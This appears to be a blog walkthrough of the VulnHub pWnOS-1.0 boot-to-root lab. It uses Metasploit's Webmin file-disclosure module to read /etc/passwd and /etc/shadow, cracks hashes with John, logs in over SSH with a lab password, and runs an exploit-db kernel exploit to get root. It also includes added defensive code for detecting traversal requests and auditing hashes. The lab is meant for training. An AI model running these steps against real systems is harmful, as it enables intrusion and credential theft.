Hack the pWnOS-1.0 (Boot To Root)

Ashish Khare
4 min read · Jul 11, 2022


https://www.youtube.com/watch?v=Bw7tw5ZfvLA

Hey folks, Ashish this side. Today we are going to solve another CTF challenge, “pWnOS-1.0” from the VulnHub labs. This challenge is not very tough; its difficulty is rated beginner/intermediate. You can download it from here: https://www.vulnhub.com/entry/pwnos-10,33/

Our goal is to gain root access to the machine.

Vulnerabilities:

  1. Arbitrary File Disclosure: a flaw that lets an attacker read files on the server that should not be reachable, such as /etc/passwd and /etc/shadow.
  2. Privilege Escalation: the act of exploiting a bug in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
  3. Weak Credentials: a weak password is one that can be guessed quickly by a brute-force attack using a subset of all possible passwords.

Penetration Methodologies:

  1. Network Scanning (Nmap)
  2. Exploiting the web application (Metasploit)
  3. Extracting arbitrary files
  4. Cracking password hashes (John the Ripper)
  5. Spawning a TTY shell (via SSH login)
  6. Kernel Privilege Escalation

Let’s get started!

We will perform a local scan to discover machines on our local network:

arp-scan -l

The IP of the target machine is 192.168.95.130.

Let’s enumerate the open ports to discover services, so we run nmap on the target machine:

nmap -A 192.168.95.130

From the result, we can see that the machine has port 22 (ssh), port 80 (http), and port 10000 (Webmin) open.

Now, we will check in Metasploit for the available Webmin exploit.

An exploit is found. We will use it to fetch the /etc/passwd and /etc/shadow files from the target machine.

use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set rhost 192.168.95.130
msf auxiliary(file_disclosure) > exploit

As you can observe, we have fetched the usernames present on the victim’s system.

msf auxiliary(file_disclosure) > set rpath /etc/shadow
msf auxiliary(file_disclosure) > exploit

As you can observe, we have also fetched the shadow file of the victim’s system, which holds the password hashes.
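From the defender’s side, the file-disclosure step above leaves a clear trace: an unauthenticated request to the Webmin service whose path climbs out of the web root towards /etc/passwd or /etc/shadow. The following is an added example (not part of this write-up, and not Webmin or Metasploit code) that scans log lines for such requests. It assumes the log uses Common Log Format-style lines; the four sample lines are constructed, not taken from the lab.

```python
"""Flag path-traversal / sensitive-file requests in a CLF-style web log.

Added example for this write-up; not the author's code. The log lines
below are constructed samples, and the CLF-like line layout is an
assumption about how the target's web service logs requests.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real pWnOS logs).
LOG_SAMPLE = """\
192.168.95.1 - - [11/Jul/2022:09:58:01 +0000] "GET /session_login.cgi HTTP/1.1" 200 2311
192.168.95.1 - - [11/Jul/2022:09:58:20 +0000] "GET /unauthenticated/../../../etc/passwd HTTP/1.0" 200 1094
192.168.95.1 - - [11/Jul/2022:09:58:21 +0000] "GET /unauthenticated/%2e%2e/%2e%2e/etc/shadow HTTP/1.0" 200 879
192.168.95.7 - - [11/Jul/2022:10:02:44 +0000] "GET /webmin/index.cgi HTTP/1.1" 401 0
"""

# client ip, timestamp, method, path, status, size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

# Files whose appearance in a request path is a finding on its own.
SENSITIVE = ("/etc/passwd", "/etc/shadow")


def parse_clf(line):
    """Return a dict for one CLF-style line, or None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    return {"ip": ip, "time": ts, "method": method, "path": path,
            "status": int(status), "size": size}


def decode_fully(s, rounds=3):
    """URL-decode repeatedly so %2e%2e and double-encoded forms are seen."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def is_traversal(path):
    """True if the path climbs directories or names a sensitive file."""
    decoded = decode_fully(path)
    for seg in decoded.split("/"):
        # ".." on its own, or ".." padded with control characters
        if re.fullmatch(r"\.\.[\x00-\x1f]*", seg):
            return True
    return any(s in decoded for s in SENSITIVE)


def find_suspicious(lines):
    """Return the parsed entries whose request path looks like traversal."""
    hits = []
    for line in lines:
        entry = parse_clf(line)
        if entry and is_traversal(entry["path"]):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for h in find_suspicious(LOG_SAMPLE.splitlines()):
        print(f'{h["ip"]} {h["time"]} {h["method"]} {h["path"]} -> {h["status"]}')
```

A status of 200 on such a request, as in the constructed sample, means the disclosure succeeded and the passwd/shadow contents should be treated as compromised; a 4xx only tells you someone tried.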

Now, we will merge passwd.txt and shadow.txt into a format that John the Ripper can understand.

Let’s crack the password hashes present in the hash.txt file using John:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
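The merge step above produces the one-line-per-user layout that John reads (what its bundled `unshadow` tool generates). The following added example, which is not part of this write-up and not John the Ripper code, performs that merge on constructed passwd/shadow samples and also classifies each shadow hash by its crypt prefix, so you can see at a glance which accounts hold a real hash and how weak the hashing scheme is. Everything in the samples except the user name `vmware`, which the post names, is made up.

```python
"""Merge passwd + shadow into John's combined format and audit the hashes.

Added example for this write-up; not the author's code and not John the
Ripper's own `unshadow`. All sample contents are constructed.
"""
import re

# Constructed sample /etc/passwd (not the real lab file).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
alice:x:1001:1001:alice,,,:/home/alice:/bin/bash
"""

# Constructed sample /etc/shadow; hashes are placeholders, not real digests.
SHADOW_SAMPLE = """\
root:$1$AbCdEfGh$0123456789abcdefghijkl:14000:0:99999:7:::
daemon:*:14000:0:99999:7:::
vmware:$1$IjKlMnOp$zyxwvutsrqponmlkjihgfe:14000:0:99999:7:::
alice:$6$saltsaltsaltsalt$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV:14000:0:99999:7:::
"""

# crypt(3) prefix -> scheme name
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}


def parse_colon_file(text):
    """Parse passwd/shadow-style text into {username: [fields...]}."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def unshadow(passwd_text, shadow_text):
    """Replace passwd's 'x' placeholder with the shadow hash, one line per user.

    Users without a shadow entry keep their passwd line unchanged, which is
    also what John's `unshadow` does.
    """
    shadow = parse_colon_file(shadow_text)
    merged = []
    for user, fields in parse_colon_file(passwd_text).items():
        fields = list(fields)
        if user in shadow:
            fields[1] = shadow[user][1]
        merged.append(":".join(fields))
    return merged


def classify_hash(h):
    """Name the hashing scheme of a shadow password field."""
    if h == "":
        return "empty"            # no password at all
    if h.startswith("*") or h.startswith("!"):
        return "locked"           # login by password disabled
    m = re.match(r"^\$([^$]+)\$", h)
    if not m:
        return "descrypt" if len(h) == 13 else "unknown"
    return SCHEMES.get(m.group(1), "unknown")


def audit(shadow_text):
    """Return [(user, scheme)] for accounts whose field is a crackable hash or empty."""
    findings = []
    for user, fields in parse_colon_file(shadow_text).items():
        scheme = classify_hash(fields[1])
        if scheme != "locked":
            findings.append((user, scheme))
    return findings


if __name__ == "__main__":
    for line in unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(line)
    for user, scheme in audit(SHADOW_SAMPLE):
        print(f"{user}: {scheme}")
```

The scheme matters for the cracking step: md5crypt ($1$) and descrypt hashes, common on hosts of this vintage, fall to a wordlist far faster than sha512crypt or bcrypt, which is why a lab like this one is cracked in seconds with rockyou.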

The password for the vmware user has been cracked. We will use it to SSH into the machine. The -oHostKeyAlgorithms=+ssh-dss option re-enables the DSA host-key algorithm, which current OpenSSH clients disable by default; without it the connection to this old target is refused.

ssh -oHostKeyAlgorithms=+ssh-dss vmware@192.168.95.130
password: h4ckm3

Now we are in the machine, and we will perform privilege escalation to gain root access.

The following exploit will be used to gain root access:

https://www.exploit-db.com/exploits/5092

Download the exploit and send it over to the target machine.

Compile the code and run it:

gcc 5092.c -o exploit
./exploit

Booommm! Here we have Root access.

If you got root and this blog was helpful, consider following me; a clap would really motivate me to write more such blogs.

Now you know what to do, try it yourself and let me know whether you pwned the system or not.

Keep Coming for more.

Happy Hacking!!!


Ashish Khare

CEHv12 | Penetration Tester | Red-Teamer | Security Analyst